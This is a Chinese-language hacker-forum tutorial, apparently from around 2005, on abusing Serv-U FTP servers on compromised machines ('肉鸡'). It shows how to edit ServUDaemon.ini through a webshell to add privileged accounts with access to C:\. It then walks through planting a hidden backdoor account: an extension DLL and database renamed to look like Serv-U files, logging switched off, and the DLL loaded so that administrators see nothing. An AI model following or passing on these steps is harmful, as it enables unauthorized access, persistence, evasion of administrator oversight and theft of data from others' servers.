信息来源:黑客基地
文章作者:宿心劫(后修订 基地没写作者)
《Serv-U提升又一法》原文见《黑客X档案》2005第一期,浪迹天发表的那篇文章。其实_blank>技术在网上很早就有了,只不过当初太有人注意。我觉得这方法很绝,所以也深入_blank>研究了一下,挖到了一点好东西,不敢独享,就决定帖出来给大家看。(其实只所以帖出来,还因为我实践时没成功,呵呵,千万去要砸我)。
讲之前就给有些朋友复习一下。全文的重点还是在那个要命的servudaemon.ini文件,如果大家有网站的webshell并且可以访问目录,修改这个文件应该不难。
下面请看一个servdaemon.ini的范例,#号后是我写的说明文字,不是文件中的文字。
[GLOBAL] #定义一些全局参数
Version=5.2.0.0
PacketTimeOut=300
PASVPortStart=9000
PASVPortRange=41
ProcessID=1064
[DOMAINS] #在这里定义域名及IP,端口号
Domain1=0.0.0.0
21|Wizard Generated Domain|1|0
[Domain1] #用户名的定义
MaxNrUsers=800
SQLListAll=
SQLListName=
SQLListSort= (这一部分我也没看懂,希望哪位高手能告诉我)
SQLDelete=
SQLInsert=
SQLUpdate=
User1=Anonymous|1|0 #第一个用户是anonymous,即匿名用户,允许匿名用户访问
User2=XXXX|1|0 #第二个用户
[USER=Anonymous|1] #用户"anonymous"的定义
HomeDir=e:\ #用户anonymous的根目录
RelPaths=1 #锁定在根目录,如果不锁定在根目录可以把该行删除
TimeOut=600
Access1=e:\|RLP #用户anonymous权限设置在此处,具体的后面会涉及
SKEYValues=
[USER=XXXX|1] #用户"XXXX"的定义
Password=cuA40FB53D1C89D1E715 #经MD5加密的_blank>密码
注:如果不想要_blank>密码应该把这行删掉,而不是简单就设为空
HomeDir=e:\\
RelPaths=1
TimeOut=600
Access1=E:\|RWAMLCDP
SKEYValues=
[DOMAINS]
Domain1=202.10.66.12||21| #前面有讲到IP和端口的设置,但我在看里其他_blank>服务器的设置,这个地方却也有出现
权限设定具体说明:
RL 只能读文件,下载文件
RWL 可以写文件,所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限,E是执行权限
RWLCD C是目录创建权限,D是目录删除权限
注意:权限后必须带P
修改的步骤是在[DOMAIN1]中先添加用户名称,如上例中已经有三个用户anonymous、XXXX、,再添加一个用户3,_blank>密码为空,在e:\目录下可以读写文件、创建删除目录,不锁定在本目录,同时对C:\有访问权限。
先在[Domain1]下增加一个用户,如下:
user3=XXXX2|1|0
然后再增加一个段,说明用户"XXXX2"的权限
[user3=XXXX2|1]
HomeDir=e:\\
TimeOut=600
Access1=e:\|RWLCDP
Access2=C:\|RLP #这里也可以自由设置
接下来就是重点的重点了,是我再网上挖到的宝贝,因为作者(我把他的名字忘记了,希望他不要找上门,呵呵)也是在本地测试通过,没有在肉机上做过,害我在肉鸡上实验时也没成功。
*********************************************************
在 Serv-U 中建立隐藏用户(本地通过,未经肉鸡测试~~希望大家完善本文)
在如今的 FTP _blank>服务段_blank>软件中,Serv-U 以其简单易用性成为广大管理员的首选,当我
们控制一台肉鸡后,如果它采用 Serv-U 管理 FTP ,我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢?
我们可以采用 Serv-U Assistant 这个_blank>软件,可以到作者网页
http://www.katkat.com/ 或
者在华军下载(目前版本为1.01)
这个_blank>软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库,实现的原理为"帐
号-映射",建立一个或多个帐号"映射",当在 Serv-U 中设置好一个固定帐号(即Serv-U
的帐号)后,"映射帐号"就继承了这个固定帐号的所有权限设置,每个"映射帐号" 有各
自的登录_blank>密码。
下载压缩文件 AssServU.zip,解压后得到以下文件:
AssServU.dll -------- 扩充功能库
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- _blank>数据库文件
AssReadme.mht ------- 自述文件
我们的目的是为了隐藏我们 FTP 账号,因此第一步我们要获取肉鸡上的一个 Serv-U
的_blank>账户名(仅_blank>账户名而已):3389图形界面可以通过 ServUAdmin.exe 获得;命令行下可以
通过 ServUDaemon.ini 获得,当然最好获得权限比较大的用户名(因为我们的隐藏账号的
权限与他的相同)
第二步:在自己的机器上做好配置:首先为了隐藏的需要,我们将assServU.mdb复制
一份为ServU.dat ,将assServU.dll改名为ServU.dll ;
双击 assServU.exe ,在 Settting 选项卡下的 Log options 中去掉 Log system
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(这是
为了系统不记录日志);在 Account Datasource 中选 Custom ,在 Connection string 点
Set ,在"连接"选项卡中的"1。选择或输入_blank>数据库名称"中将 AssServU.mdb 改为
Servu.dat ,然后点"确定",在退回 Setting 选项卡后点 Save 。
在 Account 选项卡下添加用户, Username 为你想添加的用户,如:hacker, Password
为你的_blank>密码,如:123, Serv-U account 为第一步中你选择的权限较大的用户,如:admin,
然后点 Save 按钮。
好了,配置完成。
第三步:上传我们的 ServU.dat 和 ServU.dll ,修改肉鸡的 ServUDaemon.ini 文件,添加
以下字段:
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U _blank>服务
这样你就可以用隐藏账号登陆了,此时登陆账号还是第一步你选择的账号,但_blank>密码格式
为"你的用户名=_blank>密码",如果你像第二步那样设置的话,登陆名就为admin,_blank>密码为hacker=111
hehe,这样管理员在管理界面什么都看不出来
